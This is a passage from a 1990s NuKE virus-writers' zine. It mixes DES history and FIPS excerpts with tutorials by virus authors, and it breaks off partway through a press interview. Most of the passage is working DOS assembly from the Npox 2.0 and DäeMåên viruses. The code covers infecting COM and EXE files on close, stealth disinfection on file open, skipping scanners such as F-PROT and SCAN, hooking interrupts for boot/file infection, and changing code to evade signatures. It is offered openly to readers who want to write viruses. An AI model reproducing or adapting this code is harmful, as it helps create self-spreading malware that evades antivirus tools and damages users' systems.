researchers might stumble across some of NSA's methods. Meetings of NSA and IBM resulted in an agreement by IBM to reduce its key from 128 bits to 56 bits, and to classify certain details about their selection of the eight "S" boxes for the cipher. The National Bureau of Standards passed this cipher to NSA for analysis. The NSA certified the algorithm as "free" of any mathematical or statistical weaknesses and recommended it as the best candidate for the National Data Encryption Standard (DES). This suggestion was met with criticism. Was the cipher just long enough to prevent corporate eavesdroppers from penetrating it, and just short enough for NSA's code breakers?! Was there a mathematical trick (CLASSIFIED) that would enable NSA to quickly break the code? The NSA had been tinkering with the critical "S" boxes, and it had therefore INSISTED that certain details were to be classified. The reason sited for this was simple: since the DES would be commercially available and would be sold abroad as well, NSA would be hanging itself by permitting the foreign use of an unbreakable cipher. The weaknesses designed into the cipher would still allow the agency to penetrate every communications channel and data bank using DES. The code breakers at NSA wanted to be sure the NSA could break the cipher. As a result, a bureaucratic agreement was reached. The S-Box part of the cipher was strengthened (which is CLASSIFIED), and the key, which was dependent on the users of the code was weakened. (Did NSA put a "Backdoor" into DES? The answer is normally YES! NSA had to have the upper-hand to all code encrypted with DES. If we go back a few months a movie was based on this topic. "Sneakers" raised several hints that DES had a backdoor.) Computer "rumours" (well more like FACTS) say that it would be possible to build a computer using a million special "search chips" that could test a million possible solutions per second, and, therefore in 72,000 seconds (20 hours), all possible combinations could be tried. There would be a 50% probability that just 10 hours of trial-time would break the code (56-bits). What if the 128-bit key, the original Lucifer, had been submitted for consideration? Or did IBM submit the 128-bit key Lucifer but "reasoned" with the NSA for a 56-bit key? Nevertheless a 128-bit key provides 34.03 x 10 ^ 37, or 34 followed by 37 zeros, combinations! This number is astronomical and incomprehensible to most people. If one TRILLION solutions per second were possible it would take a mere 34 x 10 ^ 25 seconds or about 10,800,000,000,000,000,000 YEARS! And we are only rumoured to know about the one-million possible solutions per second, not a trillion as used on this example! Therefore IBMs Lucifer code (at present) is probably unbreakable. DES Becomes Accepted ~~~~~~~~~~~~~~~~~~~~ And on June 15, 1977, the Data Encryption Standard (DES) became the official civilian cipher of the U.S. government. It is now widely used in banking systems and other classified institutions. To follow are a few clips from FIPS on DES, perhaps we can learn a tab from this code and implement a rather crude manner of it into a virus? Undoubtly we will have all of Soloman's, McAfee's, Frisk's and other's horses and men trying to "crack" the code, but will they succeed in doing so? There's only one way to find out now? Right? Excerpts from the Data Encryption Standard ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (From Federal Information Processing Standards (FIPS) publications 46, 74, and 81.) The Data Encryption Standard (DES) specifies an algorithm to be implemented in electronic hardware devices and used for the cryptographic protection of computer data. The publications concerning this standard provide a complete description of mathematical algorithm for encrypting (enciphering) and decrypting (deciphering) binary-coded information. Encrypting data converts the data to an unintelligible form called cipher. Decrypting a cipher converts the data back to its original form. The algorithm described in the standard specifies both enciphering and deciphering operations which are based on a binary number called a key. The key consists of 64-binary digits, of which 56 bits are used directly by the algorithm and 8 bytes are used for error detection (checksum). Binary-coded data may be cryptographically protected using the DES algorithm in conjunction with a key. The key is generated in such a way that each of the 56-bits used directly by the algorithm are random and the 8 error-detecting bits are set to make the parity of each 8-bit byte of the key odd, ie: there is an odd number of 1s in each 8-bit byte. Each member of a group of authorized users of encrypted computer data must have the key that was used to encipher the data in order to use the data. This key, held by each member in common, is used to decipher any data received in cipher form from other members of the group. The encryption algorithm specified in this standard is commonly known among those using the standard. The unique key chosen for use in a particular application makes the results of encrypting data, using the algorithm, unique. Selection of a different key causes the cipher, which is produced for any given set of inputs, to be different. The cryptographic security of the data depends on the security provided for the key that is used to encipher and decipher the data. Data can be recovered from a cipher only by using the exactly same key that was used to encipher it. Unauthorized recipients of the cipher, who know algorithm but do not have the correct key, cannot derive the original data algorithmically. However, anyone who does have the key and the algorithm can easily decipher the cipher and obtain the original data. A standard algorithm, which is based on a secure key, thus provides a basis for exchanging encrypted computer data, by issuing the key that is used to encipher it only to those authorized to have the data. Additional Federal Information Processing Standards (FIPS) guidelines for implementing and using the DES are being developed and will be published by NBS. "Guidelines for Implementing and Using the NBS Data Encryption Standard," FIPS Publication 74. NBS describes two different modes for sing the algorithm described in this standard. Blocks of data containing 64 bits may be directly entered into the device where 64-bit cipher blocks are generated under control of the key . This is called the "Electronic CodeBook" (ECB) mode. Alternating, the device may be used as a binary stream generator to produce statistically random binary bits, which are then combined with the clear (unencrypted) data (1 to 64 bits) using an "Exclusive OR" (XOR) logic operation. In order to assure that the enciphering device and the deciphering device are synchronized their inputs are always set to the previous 64 bits of cipher that were transmitted or received. This second mode of using the encryption algorithm is called the "Cipher FeedBack" (CFB) mode. The Electronic CodeBook mode generates blocks of 64 cipher bits.The Cipher Feedback mode generates a cipher having the same number of bits as the plain text. Each block of cipher is independent of all others when the Electronic CodeBook mode is used, while each byte (group of bits) of cipher depends on the previous 64 cipher bits when the Cipher FeedBack mode is used. The cryptographic algorithm specified in this standard transforms a 64-bit binary value into a unique 64-bit binary value based on a 56-bit variable. If the complete 64-bit input is used (ie: none of the input bits should be predetermined from block to block) and if the 56-bit variable is randomly chosen, no technique other than that of trying all the possible keys, using a know input and output for the DES, will guarantee finding the chosen key. As there are over 70,000,000,000,000,000 (70 quadrillion) possible keys of 56 bits, the feasibility of deriving a particular key in this way is extremely unlikely in typical "threat" environments. Moreover, if the key is changed frequently, the risk of this event happening is greatly diminished. However, users should be aware that it is theoretically possible to drive the key in fewer trials (with a correspondingly lower probability of success depending on the number of keys tried), and should be cautioned to changed the key as often as practical. Users must change the key and must provide it a high level of protection in order to minimize the potential risks of its unauthorized computation or acquisition. The feasibility of computing the correct key may change with advances in technology. Data Encryption Methods ~~~~~~~~~~~~~~~~~~~~~~~ Encryption is the transformation of data from its original intelligible form to an unintelligible cipher form. Two basic transformations may be used: permutation and substitution. Permutations changes the order of the individual symbols comprising the data. In a substitution transformation, the symbols themselves are replaced by others symbols. During permutation, the symbols retain their identities but lose their positions. During substitution, the symbols retain their positions but lose their original identities. The set of rules for a particular transformation is expressed in an algorithm. Basic transformations may be combined to form a complex transformation. In a computer system, the symbols of the data are groups of one or more binary digits (1s and 0s) called bits. A group of bits is called a byte. In computer applications, the encryption transformation of permutation reorders the bits of the data. The encryption transformation of substitution replaces one bit with another or one byte with another. Data Encryption Algorithm ~~~~~~~~~~~~~~~~~~~~~~~~~ The algorithm is designed to encipher and decipher blocks of data consisting of 64-bits under control of a 64-bit key. Deciphering must be accomplished by using the same key that was used for enciphering, but with the schedule of addressing the key bits altered so that the deciphering process is the reverse of the enciphering process. A block to be enciphered is subjected to an initial permutation, IP,and then to a compels key-dependent computation, and, finally, to a permutation which is the inverse of the initial permutation. The key-dependant computation can be defined simply, in terms of a functions "F" called the cipher function, and the function `KS' called the key schedule. A description of the computation is given first along with the details as to how the algorithm is used for encipherment. Next the use of the algorithm for decipherment is described. Finally, a definition of the cipher functions "F" is given in terms of the primitive functions, and which are called selection functions "Si" and the permutations function "P". The primitive functions Si, P, KS of the algorithm are contained in the Appendix of FIPS Publication 46. The following notation is convenient: Given two blocks (L and R) of bits, LR denotes the block consisting of the bits of L followed by the bits of R. Since concatenation is associative B1,B2...B8, for the example, denotes the block consisting of the bits of B1 followed by the bits of B2...followed by the bits of B8. Enciphering ~~~~~~~~~~~ A sketch of the enciphering computation is given below. The following information is given more clearly and accurately in FIPS Publications 46 and 74. It is quoted here for informational purposes only. The 64 bits of the input block to be enciphered are first subjected to the following permutations call the initial permutations, IP: --------- IP ----------- That is, the permuted input has bit 58 50 42 34 26 18 10 2 58 of the input as its first bit, bit 60 52 44 36 28 20 12 4 50 as its second bit, and so on, with 62 54 46 38 30 22 14 6 bit 7 as its last bit. The permuted 64 56 48 40 32 24 16 8 input to the complex key-dependent 57 49 41 33 25 17 9 1 computation described below. The 59 51 43 35 27 19 11 3 output of that computation, called the 61 53 45 37 29 21 13 5 preoutput, is then subjected to the 63 55 47 39 31 23 15 7 following permutation, IP-1, which is ------------------------ the inverse of the initial permutation -------- IP -1 --------- 40 8 48 16 56 24 64 32 That is, the output of the algorithm 39 7 47 14 54 22 62 31 has bit 40 of the preoutput block as 38 6 46 14 54 22 62 30 its first bit, bit 8 as its second bit 37 5 45 13 53 21 61 29 and so on, until bit 25 of the 36 4 44 12 52 20 60 28 preoutput block is the last bit of the 35 3 43 11 51 19 59 27 output. 34 2 42 10 50 18 58 26 33 1 41 9 49 17 57 25 ------------------------ Characteristics of the DES Algorithm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The DES algorithm is a recirculating, 64-bit, block product cipher whose security is based on a secret key. DES keys are 64- bit binary vectors consisting of 56 independent information bits and 8 parity bits. The parity bits are reserved for error-detection purposes and are not used by the encryption algorithm. The 56 information bits are used by the enciphering and deciphering operations and are referred to as the active key. Active keys are generated (selected at random from all possible keys) by each group of authorized users of a particular computer system or set of data. Each user should understand that the key must be protected and that any compromise of the key will compromise all data and resources protected by that key. In the encryption computation, the 64-bit data input is divided into two halves, with each consisting of 32 bits. One half is used as input to a compels nonlinear function, and the result is Exclusive-OR'ed to the other half. After one iteration, or round, the two halves of the data are swapped and the operation is performed again. The DES algorithm uses 16 rounds to produce a recirculating block product cipher. The cipher produced by the algorithm displays no correlation to the input. Every bit of the output depends on every bit of the input and on every bit of the active key. The security provided by the DES algorithm is based on the fact that, if the key is unknown, an unauthorized recipient of encrypted data, knowing some of the matching input data, must perform an unacceptable effort to decipher other encrypted data or recover the key. Even having all but one bit of the key correct does not result in intelligible data. The only known way of obtaining the key with certainty is by obtaining matching ciphertext and plaintext and, then, exhaustively testing the keys by enciphering the known plaintext with each key and comparing the result with the known ciphertext. Since 56 independent bits are used in a DES key, 2^56 such tests are required to guarantee finding a particular key. The expected number of tests needed to recover the correct key is 2^55. At one microsecond per test, 1142 years would be required. Under certain conditions (not only knowing matched plaintext and ciphertext but also the complement of the plaintext and the resulting ciphertext), the expected effort could be reduced to 571 years. The possibility of 70 quadrillion keys makes the guessing or computing of any particular key very unlikely, given that the guidelines for generating and protecting a key provided in the publication are followed. Of course, on can always reduce the time required to exhaust any crytoalgorithm by having several devices working in parallel; time is reduced but initial expenses are increased. Rock Steady/NuKE =========================================================================== =========================================================================== ************************************* ** Disinfecting an Infected File ** ** ** ** By Rock Steady/NuKE ** ************************************* The BEST advantage a virus can have is `Disinfecting of Fly' as we must try to basically hide the virus as well as possible! And nowadays Anti- Virus programs are going crazy. As I remember at the time Npox 2.0 was developed it would Disinfect every file opened by F-prot and Scan and when the Scanner found nothing and closed the file to go on to the next Npox would re-infect them. Truly can cause havoc, As a matter of fact Frisk didn't like this as I had some `Anti Fuck-Prot' routines and he added his own routine to open files by Int21h/6C00h, as Npox only disinfected on Int21h/3Dh, however to make the virus disinfect on Int21h/6C00h, doesn't require much work, simply to take the ASCIIZ string at DS:SI and put SI into DX so we have DS:DX pointing to it, then run this routine. The Basic idea on disinfection is this... -For .COM files Restore the first 3 bytes original Bytes of the program, these 3 bytes are usually somewhere inside the virus, and then simply remove the virus from the end of the .COM file! We do this by jumping to the end of the COM file and subtracting the Virus size from the File size and that new value is the original file size! NOTE: if you write a virus that its length changes (Polymorphic) its wise to save the original Filesize to be infected before hand. -For .EXE files & Overlays This procedure is not different, just that if you changed CS:IP & SP:SS in the EXE header, simply restore the original values, or to save time, simple save the Original EXE header (first 1b bytes) in the virus and right that to the beginning as I did for Npox 2.0 Then Subtract yourself from the original size and cut it off! I will now follow thru the Npox 2.0 virus routine Closely so you can under stand this process. Okay first thing you would want to do is CHECK if this is a valid file! If the virus infects COMs & EXEs, do not waste your time looking thru other extensions, or for tight code you can waste your time and "HOPE" the `infection' marker will fail! Meaning if the virus uses the seconds field set to 60 (as Npox) then naturally only INFECTED files will have a time stamp of 60! And this routine is not needed... opening_file: call check_extension ;Check for .COM extension jnc open_fuck2 ;YES; Jmp & Disinfect call check_exten_exe ;Check for .EXE extension jnc open_fuck2 ;YES; Jmp & disinfect jmp dword ptr cs:[int21] ;Other wise goto DOS ; At this point the file has an .COM or .EXE extension, so we continue open_fuck2: push ax ;Save AX mov ax,3d02h ;Ready to open call calldos21 ;Do it! ;NOTE: its important you called Int21h YOURSELF! you CAN NOT do a "Int 21h" ;command, as the virus will intercept it, and will come to this routine ;and it will continue over and over again, Never ending loop, until the ;stack gets too big, overwrite the code and the system jams...All done ;in about 2 seconds... jnc open_fuck1 ;No Error Continue pop ax ;restore iret ;Exit open_fuck1: push bx push cx push dx push ds mov bx,ax ;BX=File handler mov ax,5700h ;Get file TimeStamp call calldos21 mov al,cl ;move seconds into al or cl,1fh ;Left just seconds dec cx ;60 Seconds xor al,cl ;cmp jnz opening_exit3 ;NOT 60 seconds exit! dec cx mov word ptr cs:[old_time],cx ;Save time Stamp mov word ptr cs:[old_date],dx ;Save Date Stamp mov ax,4202h ;Goto the End of File xor cx,cx xor dx,dx call calldos21 mov cx,dx ;Save the filesize mov dx,ax ;we will need it later ;to subtract the virus push cx ;size fromit... push dx ;Save it... Here now we get the first 3 bytes (for com) or first 1B bytes (EXE header) in the Nuke Pox virus I save the ORIGINAL first 3 bytes of the .com at the VERY END! Since the buffer I made was 1B hex bytes, it is able to hold the EXE header or 3 .com bytes, anyhow the beginning of these bytes are the last 1B bytes, since its at the end... figure it out where you saved your 3 bytes or exe header for your virus, or use the Npox routine... sub dx,1Bh ;Subtract 1B bytes from sbb cx,0 ;the filesize! mov ax,4200h ;Now our pointer will call calldos21 ;point to the 1B bytes ;Where the COM & EXE ;original bytes are push cs pop ds ;CS=DS (for exes) mov ah,3fh ;Read them into Buffer mov cx,1Bh ;1B bytes mov dx,offset buffer ;to our buffer call calldos21 humm, now we got the original bytes, all we gotta do is write them back to the file's beginning... xor cx,cx ;Goto Beginning of File xor dx,dx ; mov ax,4200h call calldos21 mov ah,40h ;Write first three bytes mov dx,offset buffer ;our buffer mov cx,1Bh ;1B bytes for EXEs cmp word ptr cs:[buffer],5A4Dh je open_exe_jmp ;if EXE file jump mov cx,3h ;if COM write only 3 bytes open_exe_jmp: call calldos21 We wrote the original file's data back to place, now we need to cut the virus off from the file, the virus is written at the end of the file, so all we do is set our file-pointer to EOF - Virus_Size, which gives us the original file length! pop dx ;EOF - Virus_Size pop cx ;to get ORIGINAL File size sub dx,virus_size ;subtract virus size sbb cx,0 mov ax,4200h call calldos21 Now this is perhaps the "TRICKIEST" part, in order to "CROP" the file, at our new ptr location, what we do it use does to crop it, by writing 0 bytes to the new location, DOS will make that new location the NEW EoF and in result cutting off the virus and deleting its sector in the fat. mov ah,40h ;Write new EOF xor cx,cx ;Zero Bytes call calldos21 ;doit mov cx,word ptr cs:[old_time] ;Restore file time mov dx,word ptr cs:[old_date] ;Restore file date mov ax,5701h int 21h mov ah,3eh ;Close File call calldos21 opening_exit3: pop ds pop dx pop cx pop bx pop ax jmp dword ptr cs:[int21] ;Return to DOS... ahh, the file is now Disinfected, now we safely return it to DOS and DOS may now open the file for inspection... Rock Steady/NuKE =========================================================================== =========================================================================== **************************** ** Infection on Closing ** ** ** ** By Rock Steady/NuKE ** **************************** This routine goes out for a few people that had trouble hacking this routine themselves... I kinda like it, its my very OWN, no Dark Avenger hack, it is VERY straight forward, and kinda simple...I was not going to put this here, but since I `Promised' people and left them hanging with `Wait for IJ#5, I guess I owed you it... huh?' Again this code comes right out of Npox 2.0, its need, simple fast, cool, and it works, Npox is your example, I heard MANY MANY complaints with other `Virus writing guides' Meaning they explained the code but sometimes the arthur himself never check if the code was good, as he may have modified it, and not test it... or whatever reason... Anyhow ------------------ Okay once you intercepted the Int21h/ah=3Dh function you make it jump here... closing_file: cmp bx,0h ;Handle=0? je closing_bye ;if equal leave cmp bx,4h ;Handle > 4 ja close_cont ;if YES ,then JUMP! closing_bye: jmp dword ptr cs:[int21] ;Leave, no interest to us The whole point of the above code is that DOS contains 5 predefined Handlers, 0 -> 4, Basically, those handles are the NULL, CON, AUX COMx, LPTx handles... So we surely do not need to continue once we encounter that... close_cont: push ax push bx push cx push dx push di push ds push es push bp Our biggest problem is how do we know if this file is a .COM or .EXE or simply just another dumb data file? We need this info before we can try to infect it... We do this by getting DOS's "Lists of List" this will give us all INFO need on the File Handle Number we have in BX! and we do that like so... push bx ;Save File Handle mov ax,1220h ;Get the Job File Table int 2fh ;(JFT) This will give us the JFT for the CURRENT File handle in BX, which is given thru ES:DI Then we use this information to get the Address of the System File Table! mov ax,1216h ;Get System File Table (List) mov bl,es:[di] ;system file table entry number int 2fh pop bx ;restore the Handle add di,0011h mov byte ptr es:[di-0fh],02h add di,0017h ;Jump to the ASCIIZ string cmp word ptr es:[di],'OC' ;Is it a .COM file? jne closing_next_try ;Next cmp... cmp byte ptr es:[di+2h],'M' jne pre_exit ;Nope exit jmp closing_cunt3 ;.COM file continue closing_next_try: cmp word ptr es:[di],'XE' ;Is it a .EXE file? jne pre_exit ;No, exit cmp byte ptr es:[di+2h],'E' jne pre_exit ;No, exit If it is an .EXE file, check if it is F-PROT or SCAN, see F-PROT when started up, Opens itself, closes itself, etc... So that a dumb virus will infect it, and then the CRC value changes and F-PROT screams... haha... Fuck-Prot! is the name... closing_cunt: cmp word ptr es:[di-8],'CS' jnz closing_cunt1 ;SCAN cmp word ptr es:[di-6],'NA' jz pre_exit closing_cunt1: cmp word ptr es:[di-8],'-F' jnz closing_cunt2 ;F-PROT cmp word ptr es:[di-6],'RP' jz pre_exit closing_cunt2: cmp word ptr es:[di-8],'LC' jnz closing_cunt3 cmp word ptr es:[di-6],'AE' ;CLEAN jnz closing_cunt3 pre_exit: jmp closing_nogood The REST is pretty much the EXACT same on `how' you'd infect a normal file, I'll leave it for you to go thru it... The hardest part is OVER! Only trick part is, the ending... Remember to Close the file and then do an IRET, you don't leave control to dos, as you only needed to close it, so do it... OR DON'T close it and return to DOS, as dos will close it, just DON'T CLOSE IT TWICE!!!! closing_cunt3: mov ax,5700h ;Get file Time call calldos21 mov al,cl or cl,1fh dec cx ;60 Seconds xor al,cl jz closing_nogood ;Already infected push cs pop ds mov word ptr ds:[old_time],cx ;Save time mov word ptr ds:[old_date],dx mov ax,4200h ;jmp beginning of xor cx,cx ;file... xor dx,dx call calldos21 mov ah,3fh ;Get first 1b byte mov cx,1Bh mov dx,offset buffer call calldos21 jc closing_no_good ;error? mov ax,4202h ;Jmp to the EOF xor cx,cx xor dx,dx call calldos21 jc closing_no_good cmp word ptr ds:[buffer],5A4Dh ;.EXE file? je closing_exe ;Yupe then jmp mov cx,ax sub cx,3h mov word ptr ds:[jump_address+1],cx ;Figure out the call infect_me ;jmp for .com jc closing_no_good mov ah,40h ;Write it to file mov dx,offset jump_address mov cx,3h call calldos21 closing_no_good: mov cx,word ptr ds:[old_time] ;Save file time mov dx,word ptr ds:[old_date] ;& date mov ax,5701h call calldos21 closing_nogood: pop bp pop es pop ds pop di pop dx pop cx pop bx pop ax jmp dword ptr cs:[int21] AS you see the above, we DIDN'T close the file, so we leave dos to do it. The bottom is for infecting .exes... closing_exe: mov cx,word ptr cs:[buffer+20] ;Save the original mov word ptr cs:[exe_ip],cx ;CS:IP & SS:SP mov cx,word ptr cs:[buffer+22] mov word ptr cs:[exe_cs],cx mov cx,word ptr cs:[buffer+16] mov word ptr cs:[exe_sp],cx mov cx,word ptr cs:[buffer+14] mov word ptr cs:[exe_ss],cx push ax push dx call multiply sub dx,word ptr cs:[buffer+8] mov word ptr cs:[vir_cs],dx push ax push dx call infect_me pop dx pop ax mov word ptr cs:[buffer+22],dx mov word ptr cs:[buffer+20],ax pop dx pop ax jc closing_no_good add ax,virus_size adc dx,0 push ax push dx call multiply sub dx,word ptr cs:[buffer+8] add ax,40h mov word ptr cs:[buffer+14],dx mov word ptr cs:[buffer+16],ax pop dx pop ax push bx push cx mov cl,7 shl dx,cl mov bx,ax mov cl,9 shr bx,cl add dx,bx and ax,1FFh jz close_split inc dx close_split: pop cx pop bx mov word ptr cs:[buffer+2],ax mov word ptr cs:[buffer+4],dx mov ah,40h mov dx,offset ds:[buffer] mov cx,20h call calldos21 closing_over: jmp closing_no_good ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- ; Infection Routine... ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- infect_me proc mov ah,40h mov dx,offset init_virus mov cx,virus_size call calldos21 jc exit_error ;Error Split mov ax,4200h xor cx,cx ;Pointer back to xor dx,dx ;Top of file! call calldos21 jc exit_error ;Split Dude... clc ;Clear carry flag ret exit_error: stc ;Set carry flag ret infect_me endp =========================================================================== =========================================================================== Multipartite Infection ~~~~~~~~~~~~~~~~~~~~~~ OK, you've seen them floating around... these whiz-bang you-bewt mongrel viruses which never seem to go away, even after you disinfect every file in existence... Huh... How the fuck did that come back?! Well it's really quite simple, and I'm sure not all of you out there are complete idiots. The fact is that the virus isn't even in any files! ...It's hiding in the partition table, or the boot sector! There are only a few viruses out there with the capability for multipartite infection, or "boot/file virus". Tequila, Anthrax and Invader are a few examples. My own creation, DäeMåên, is another, going a step further than any other boot/file virus has ever gone before, by infecting almost everything possible. The principle is VERY simple, in fact I kicked myself when I worked out a way to do it. The idea is simple, and it's the very same principle employed in any other TSR method... to hook interrupt 21h (DOS). This is fine. BUT the only hitch is that DOS automatically overwrites the old vector when it loads! So there's no point hooking it as soon as your code loads up off the disk. So what can we do? We will obviously have to wait for DOS to change the interrupt, so we can hook it. But there's one problem! Other stupid programmers were being selfish and change the i21 pointer as a marker so that they can tell if it's been changed... like Invader puts in a -1 in the IP value of int 21h... so if something like DaeMaen is also on the sytem, it thinks it's DOS changing the pointer, hooks it and crashes the entire system... The way I waited for the pointer to change was to hook interrupt 13 TWICE! (huh?) Pretty simple. What I did was have my int-check routine hooked onto i13 first, then my i13 handler over the top. The reason why you can't have it the other way is that in case another "program" hooks i13 over the top, and you can't disable your int-check routine... so it'll keep re-hooking and fuck up the system. (You could do it with flags, but I try and use as few flags as possible to keep code size down to a minimum). At boot-up, the program checks to see if it's already TSR (via an illegal call to some interrupt, and checking the return code) and if it isn't, it steals some memory (something F-Prot and friends can pick up, but who gives a fuck, plus I can get around that now...), hooks int 13h with the int-check routine, hooks it again with our i13 handler, then save the current interrupt 21h vector. On every disk call, it compares the value of i21 with the saved value... if it's different, the int-check routine hooks it and then change the vector that our int 13h handler calls, so it no longer calls our int-check routine but goes straight to the real i13. That's the essentials of boot/file management. Anyhow, here's the code to do what I just said, as it appears in the source code of DäeMåên... new13_2: ; the guts of multipartite infection ; check to see if i21 has changed... if so, hook it call save ; save registers push cs pop es xor ax, ax mov ds, ax mov si, 21h*4 mov di, offset oldvect+8 cld cmpsw je nochange cmpsw je nochange call capture_21 push cs pop ds mov si, offset oldvect+0 ; copy over other ptr so lea di, [si+4] ; that our i13 doesn't call movsw ; here any more [i21 has movsw ; been hooked] nochange: call restore ; restore registers jmp dword ptr cs:[oldvect+0] This method can be used on either floppy boot sector infection or the HD partition table infection. As with many of my routines, stuff which took many other virus writers a few pages of code took me one page... that's not bad! I have many other goodies up my sleeve, like a 387-byte generic COM/EXE parasitic infector on execution, the smallest of its kind in the WORLD... (with room for improvement!). Anyway, next InfoJournal will include the source codes to two of my prerelease Mutation Engines, both of which are fully functional in their own right. They have evolved far beyond my dreams, and I hope to have the world's best mutation engine finished by the end of February/March. (but it can't be the best at everything, but it sure generates a bucket fuckload of arcane bullshit instructions. Heuristical nightmare...) Anyway, have fun screwing around with this little piece of research material... TäLöN/NuKE =========================================================================== =========================================================================== DäeMåên Virus ~~~~~~~~~~~~~ This virus took me a while to write (about two weeks), because I was writing a lot of it for the first time. Some of the code is a bit overboard, like I don't think the SYS entry has to be quite that complex in order to work... but never mind. At least it works and it's quite well-behaved. This virus is my first boot/file virus, and that also works perfectly. I worked all my own routines from scratch (my virus collection is extremely small, and I don't want to be influenced by other implementations unless they're better). It infects both floppy boot sectors, moving the original boot sector to the 5th last sector of the disk and writing the virus code on the last four. It also infects the Master Boot Record (partition table) on the first physical hard disk. Booting off an infected floppy will infect the MBR, as will the execution of an infected file. However, trying to read the partition table results in the redirection of the call, resulting in the original partition table (prior to infection) being read/written. Floppies are infected on read/write access, and won't be infected if the drive is still spinning (ie. no disk change). It will take the boot sector and use the BPB to calculate the last sectors of the disk, no matter what format, be it 160k, 1.44meg, or even a 20meg floptical disk. It makes sure it's a valid BPB by checking the OEM name to see if it's valid alphanumeric characters, but I was a bit selfish in that I overwrite the last word of OEM to mark infection. Files ending with the extensions .COM, .EXE, .BIN, .OVL and .SYS will be infected on every possible file handle access I could find, ie. they will be infected on Open (3D), Close (3E), Attrib Change (43), Execution (4B), Handle Rename/Move (56), and Extended Open (6C). It manages to infect on file close by recording the filename by intercepting Create (3C) call, and the handle if it was created successfully. If resident off infected file, it will not hook int 13h directly, instead searching segment 70h for DOS's call to the original interrupt handler, then putting our address in there instead and using the old address for our calls. It would have been possible to search the ROM BIOS for the correct handler, but that would circumvent future generations of boot/file viruses. DäeMåên employs a small decryption algorythm, however it is not variable mutation, since a few registers have to be saved in order for the SYS infection to work. The code is thoroughly encrypted, and McAfee and friends will have to write a new disinfection engine for this baby. However, disk infections are not encrypted, although it would have been easily done. The routine to load the virus off the disk has been altered to avoid detection as Generic Boot Sector/Generic Partition virus. The changes are trivial, and it makes it look as if I don't know what I'm doing. The fact that I'm avoiding detection isn't readily apparent. Here is a code comparison, take a look for yourself. Generic DäeMåên mov si, 413h mov si, 412h sub word ptr [si], 3 add word ptr [si+1], -3 ; take 3k int 12h lodsb lodsw mov cl, 6 mov cl, 6 shl ax, cl shl ax, cl mov es, ax mov es, ax xor bx, bx xor bx, bx The one on the left will be detected by SCAN, the one on the right will not. The differences are trivial. SCAN is such a stupid program, it's just ridiculous that millions of PC users rely on it utterly for total virus protection. That's great... DäeMåên is partially selective in which files it infects. Firstly, it will scan the filename for the characters SC, VS, CL and F-, which excludes a lot of scanners (eg SCAN, TBSCAN etc), VSHIELD, CLEAN and F-PROT. Nor will it infect programs which have internal overlays. This is a great advantage since people running WinDoze won't have their favourite XYZ program fuck up because a virus infected it. DäeMåên simply will not infect programs with internal overlays. Here is the code to detect them: chkovl: call file_end push ax ; check for internal overlays push dx mov ax, word ptr [page_cnt] mov cx, 512 mul cx pop cx pop bp cmp ax, bp jb done cmp dx, cx jb done [...] done: ret Pretty simple routine, huh? The beauty of this beast is that one small mistake, like trying to boot an infected disk by accident, or perhaps running an infected file, is that next time you boot up your system, EVERY file in your CONFIG.SYS, AUTOEXEC.BAT and everything henceforth will become infected! It is very easy to expose a large number of files to the virus in a very short space of time. Again, SCAN will probably help the spread of this virus immensely, by stupid users scanning their HD habitually, with the virus in memory... of course, EVERY file will then be infected. As if that weren't enough for one virus, DäeMåên will also hide the increase of file size on the DOS directory. However, like most other viruses which employ this stealth method, CHKDSK will not report any allocation errors on these files. File size increase will be only 2048 bytes, or 4096 bytes for SYS files. It will account for the different increase of the SYS. To hide the increase, DäeMåên employs a little-exploited method, which is by adding 100 years to the date of the file. This way, other over-exploited methods (like setting the seconds field to a certain value) will not interfere with DäeMåên's stealth operation, and vice-versa. DäeMåên also includes a number of text strings: "[DäeMåên] by TäLöN-{NûKΣ}" 25 bytes "Hugs to Sara Gordon" 19 bytes "Hey John! If this is bad, wait for [VCL20]!" 43 bytes "For Dudley" 11 bytes "[VCL20ß]/TäLöN" 15 bytes total 113 bytes (That stuff about VCL20ß is ßogus, just to make McAsshole shit his pants. But AV researchers be warned: a fair few of the routines contained in DäeMåên will also appear in VCL 2.0, like the boot/file infect capability!) Virus Length = 2048 Message Length = 113 ...Code Length = 1935 bytes!!! Totally unheard of! I seriously doubt anybody can beat that, at least not for a while yet. For a quick rehash of what this virus does... COM/EXE/BIN/OVL/SYS/MBR/BS Parasitic Self-Encrypting Stealth virus, a mere 2048 bytes long... but I can say Patricia Hoffman will totally fuck up her description of this virus, she is so pathetically brain-dead. Anyway, look out for a FULL STEALTH, WILDLY POLYMORPHIC COM/EXE/MBR INFECTOR coming soon to a computer installation near you! From TäLöN of course! And another one minus the polymorphism, under 800 bytes! Have fun! And good night, John! TäLöN/NuKE =========================================================================== =========================================================================== Sunday Telegraph Interview ~~~~~~~~~~~~~~~~~~~~~~~~~~ Well, about a month ago a NuKE associate received a call from a female reporter named Barbara Lewis; it was not our first, and surely not our last. Nevertheless, the topic she arose was quite interesting! We have the complete conversation with our NuKE member and Barbara Lewis. For those that need more info, Barbara Lewis is an English reporter for the _Sunday Telegraph_ in the United Kingdom. The article should also be published in the _New York Times_, and I guess we will pin it up with the others now. Anyhow the conversation... Barbara> Beep-Bop-Beep-Dot-Beep-Beep-Bop. [Dials the number...] Nuke > Hello? Barbara> Yes, I'm looking for "Joseph Greco," as I am a reporter, Barbara Lewis, for the _Sunday Telegraph_ in London. Is he there? Nuke > This is he, how can I help you. [The old charms.] Barbara> I am writing an article on virus groups and related underground activities, I received this number from a friend telling me I could get some information from you. Nuke > What do you wish to know, and I will see if I can help you. Barbara> I wish to know about the virus writers, why do they write such programs? What do they find from these malicious programs? Nuke > I believe you have the concept all messed up. Speaking on the behalf of NuKE members we find that producing perhaps the most technological advanced virus to exist, will if chance help the AV (anti-virus) community to develop a standard or perhaps a minimum of what their packages should do, as if it is capable of the most advanced virus then getting the others is no problem. Also, we see today that the anti-virus community are trying to pull a suppression over all the computer users, and terrorize them with this bad thing called a virus. Of course this method is simply for the fact of increasing sales of their AV product, which in turn is described to perform miracles when it comes to virus protection. We have all heard about the well known SCAN by McAfee, we have succeed in removing all their virus strings and have found that there was only 850 of them, and doesn't SCAN boast 1700+ viruses? Perhaps he has a copy of every virus twice? Who knows! Barbara> So you say that you are 